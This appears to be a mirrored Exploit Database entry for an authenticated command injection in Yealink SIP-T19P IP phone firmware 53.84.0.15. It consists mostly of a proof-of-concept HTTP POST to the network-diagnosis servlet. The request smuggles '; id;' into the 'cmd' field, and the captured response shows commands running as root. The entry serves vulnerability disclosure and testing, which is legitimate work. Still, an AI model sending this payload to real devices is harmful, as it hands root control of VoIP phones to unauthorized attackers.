YeaLink SIP-TXXXP 53.84.0.15 – ‘cmd’ Command Injection (Authenticated)

• Exploit Database
• 141 阅读

• 作者： tahaafarooq
  日期： 2021-11-11
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50509/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45

  # Exploit Title: YeaLink SIP-TXXXP 53.84.0.15 - &apos;cmd&apos; Command Injection (Authenticated) # Date: 11-10-2021 # Exploit Author: tahaafarooq # Vendor Homepage: https://www.yealink.com/ # Version: 53.84.0.15 # Tested on: YeaLink IP Phone SIP-T19P (Hadrware VOIP Phone)   Description:   Using Diagnostic tool from the Networking Tab to perform a Ping or Traceroute , to perform OS command injection   POC:   POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1 Host: xxx.xxx.xxx.xxx Content-Length: 49 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: */* Origin: http://xxx.xxx.xxx.xxx Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: JSESSIONID=9a83d24461329a130 Connection: close   cmd=; id;&token=1714636915c6acea98   -------------------------------------------------   HTTP/1.1 200 OK Content-Type: text/html Connection: close Date: Wed, 10 Nov 2021 14:20:23 GMT Server: embed httpd Content-Length: 82   <html> <body> <div id="_RES_INFO_"> uid=0(root) gid=0(root) </div> </body> </html>